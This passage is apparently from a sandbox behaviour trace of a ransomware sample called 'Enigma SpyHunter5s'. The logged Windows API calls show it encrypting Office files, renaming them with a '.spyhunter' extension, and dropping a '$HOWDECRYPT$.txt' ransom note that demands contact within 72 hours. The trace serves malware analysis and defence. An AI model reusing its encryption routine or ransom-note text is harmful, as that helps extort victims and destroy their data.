lpNumberOfBytesWritten=0x270fd5c, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x270fd5c*=0x2800, lpOverlapped=0x0) returned 1 [0087.692] GetProcessHeap () returned 0x2c0000 [0087.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.692] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.692] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd5c, lpOverlapped=0x0 | out: lpBuffer=0x270fd9c*, lpNumberOfBytesWritten=0x270fd5c*=0x4, lpOverlapped=0x0) returned 1 [0087.694] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd5c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd5c*=0x30, lpOverlapped=0x0) returned 1 [0087.694] CloseHandle (hObject=0x16c) returned 1 [0087.757] GetProcessHeap () returned 0x2c0000 [0087.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0087.757] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL.spyhunter") returned 82 [0087.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll.spyhunter")) returned 1 [0087.758] GetProcessHeap () returned 0x2c0000 [0087.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0087.758] GetProcessHeap () returned 0x2c0000 [0087.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.758] GetProcessHeap () returned 0x2c0000 [0087.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x385280 | out: hHeap=0x2c0000) returned 1 [0087.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0087.786] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.786] WriteFile (in: hFile=0x17c, lpBuffer=0x270fcd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdfc, lpOverlapped=0x0 | out: lpBuffer=0x270fcd3*, lpNumberOfBytesWritten=0x270fdfc*=0x127, lpOverlapped=0x0) returned 1 [0087.787] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.787] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdfc*=0x2ac, lpOverlapped=0x0) returned 1 [0087.788] CloseHandle (hObject=0x17c) returned 1 [0087.788] GetProcessHeap () returned 0x2c0000 [0087.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353df8 | out: hHeap=0x2c0000) returned 1 [0087.788] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd98 | out: pbBuffer=0x270fd98) returned 1 [0087.788] GetProcessHeap () returned 0x2c0000 [0087.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd90*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd90*=0x30) returned 1 [0087.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0087.789] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0087.789] StrStrW (lpFirst="ExcelMUI.XML", lpSrch=".txt") returned 0x0 [0087.789] GetProcessHeap () returned 0x2c0000 [0087.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.789] ReadFile (in: hFile=0x17c, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x270fd54*=0x61d, lpOverlapped=0x0) returned 1 [0087.836] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.836] WriteFile (in: hFile=0x17c, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x270fd54*=0x61d, lpOverlapped=0x0) returned 1 [0087.836] GetProcessHeap () returned 0x2c0000 [0087.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.836] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.836] WriteFile (in: hFile=0x17c, lpBuffer=0x270fd94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x270fd94*, lpNumberOfBytesWritten=0x270fd54*=0x4, lpOverlapped=0x0) returned 1 [0087.836] WriteFile (in: hFile=0x17c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd54*=0x30, lpOverlapped=0x0) returned 1 [0087.837] CloseHandle (hObject=0x17c) returned 1 [0087.925] GetProcessHeap () returned 0x2c0000 [0087.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a6878 [0087.925] wnsprintfW (in: pszDest=0x3a6878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.spyhunter") returned 118 [0087.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.spyhunter")) returned 1 [0087.927] GetProcessHeap () returned 0x2c0000 [0087.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a6878 | out: hHeap=0x2c0000) returned 1 [0087.927] GetProcessHeap () returned 0x2c0000 [0087.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.927] GetProcessHeap () returned 0x2c0000 [0087.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353bb0 | out: hHeap=0x2c0000) returned 1 [0087.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd98 | out: pbBuffer=0x270fd98) returned 1 [0087.928] GetProcessHeap () returned 0x2c0000 [0087.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.928] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd90*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd90*=0x30) returned 1 [0087.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0087.953] StrStrW (lpFirst="OSetupPS.dll", lpSrch=".txt") returned 0x0 [0087.953] GetProcessHeap () returned 0x2c0000 [0087.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37b468 [0087.953] ReadFile (in: hFile=0x170, lpBuffer=0x37b468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x37b468*, lpNumberOfBytesRead=0x270fd54*=0x2800, lpOverlapped=0x0) returned 1 [0087.966] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.966] WriteFile (in: hFile=0x170, lpBuffer=0x37b468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x37b468*, lpNumberOfBytesWritten=0x270fd54*=0x2800, lpOverlapped=0x0) returned 1 [0087.966] GetProcessHeap () returned 0x2c0000 [0087.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b468 | out: hHeap=0x2c0000) returned 1 [0087.967] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.967] WriteFile (in: hFile=0x170, lpBuffer=0x270fd94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x270fd94*, lpNumberOfBytesWritten=0x270fd54*=0x4, lpOverlapped=0x0) returned 1 [0087.968] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd54, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd54*=0x30, lpOverlapped=0x0) returned 1 [0087.968] CloseHandle (hObject=0x170) returned 1 [0087.979] GetProcessHeap () returned 0x2c0000 [0087.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.980] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.spyhunter") returned 106 [0087.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll.spyhunter")) returned 1 [0087.982] GetProcessHeap () returned 0x2c0000 [0087.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0087.982] GetProcessHeap () returned 0x2c0000 [0087.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.982] GetProcessHeap () returned 0x2c0000 [0087.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375a40 | out: hHeap=0x2c0000) returned 1 [0087.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0088.026] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.026] WriteFile (in: hFile=0x170, lpBuffer=0x270fcc7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdf0, lpOverlapped=0x0 | out: lpBuffer=0x270fcc7*, lpNumberOfBytesWritten=0x270fdf0*=0x127, lpOverlapped=0x0) returned 1 [0088.027] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.027] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdf0*=0x2ac, lpOverlapped=0x0) returned 1 [0088.029] CloseHandle (hObject=0x170) returned 1 [0088.029] GetProcessHeap () returned 0x2c0000 [0088.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353bb0 | out: hHeap=0x2c0000) returned 1 [0088.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0088.043] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.043] WriteFile (in: hFile=0x170, lpBuffer=0x270fcc3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdec, lpOverlapped=0x0 | out: lpBuffer=0x270fcc3*, lpNumberOfBytesWritten=0x270fdec*=0x127, lpOverlapped=0x0) returned 1 [0088.044] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.044] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdec*=0x2ac, lpOverlapped=0x0) returned 1 [0088.045] CloseHandle (hObject=0x170) returned 1 [0088.045] GetProcessHeap () returned 0x2c0000 [0088.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375ef0 | out: hHeap=0x2c0000) returned 1 [0088.045] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd88 | out: pbBuffer=0x270fd88) returned 1 [0088.045] GetProcessHeap () returned 0x2c0000 [0088.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0088.045] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd80*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd80*=0x30) returned 1 [0088.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0088.047] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0088.047] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0088.047] GetProcessHeap () returned 0x2c0000 [0088.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0088.047] ReadFile (in: hFile=0x170, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd44, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x270fd44*=0x75e, lpOverlapped=0x0) returned 1 [0088.153] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.153] WriteFile (in: hFile=0x170, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x270fd44, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x270fd44*=0x75e, lpOverlapped=0x0) returned 1 [0088.153] GetProcessHeap () returned 0x2c0000 [0088.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0088.153] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.153] WriteFile (in: hFile=0x170, lpBuffer=0x270fd84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd44, lpOverlapped=0x0 | out: lpBuffer=0x270fd84*, lpNumberOfBytesWritten=0x270fd44*=0x4, lpOverlapped=0x0) returned 1 [0088.153] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd44, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd44*=0x30, lpOverlapped=0x0) returned 1 [0088.153] CloseHandle (hObject=0x170) returned 1 [0088.159] GetProcessHeap () returned 0x2c0000 [0088.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0088.159] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.spyhunter") returned 120 [0088.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.spyhunter")) returned 1 [0088.159] GetProcessHeap () returned 0x2c0000 [0088.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0088.159] GetProcessHeap () returned 0x2c0000 [0088.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0088.159] GetProcessHeap () returned 0x2c0000 [0088.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375dc8 | out: hHeap=0x2c0000) returned 1 [0088.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0088.160] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.160] WriteFile (in: hFile=0x170, lpBuffer=0x270fcbb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fde4, lpOverlapped=0x0 | out: lpBuffer=0x270fcbb*, lpNumberOfBytesWritten=0x270fde4*=0x127, lpOverlapped=0x0) returned 1 [0088.161] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.161] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fde4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fde4*=0x2ac, lpOverlapped=0x0) returned 1 [0088.161] CloseHandle (hObject=0x170) returned 1 [0088.161] GetProcessHeap () returned 0x2c0000 [0088.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b480 | out: hHeap=0x2c0000) returned 1 [0088.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd80 | out: pbBuffer=0x270fd80) returned 1 [0088.161] GetProcessHeap () returned 0x2c0000 [0088.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0088.161] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd78*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd78*=0x30) returned 1 [0088.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common 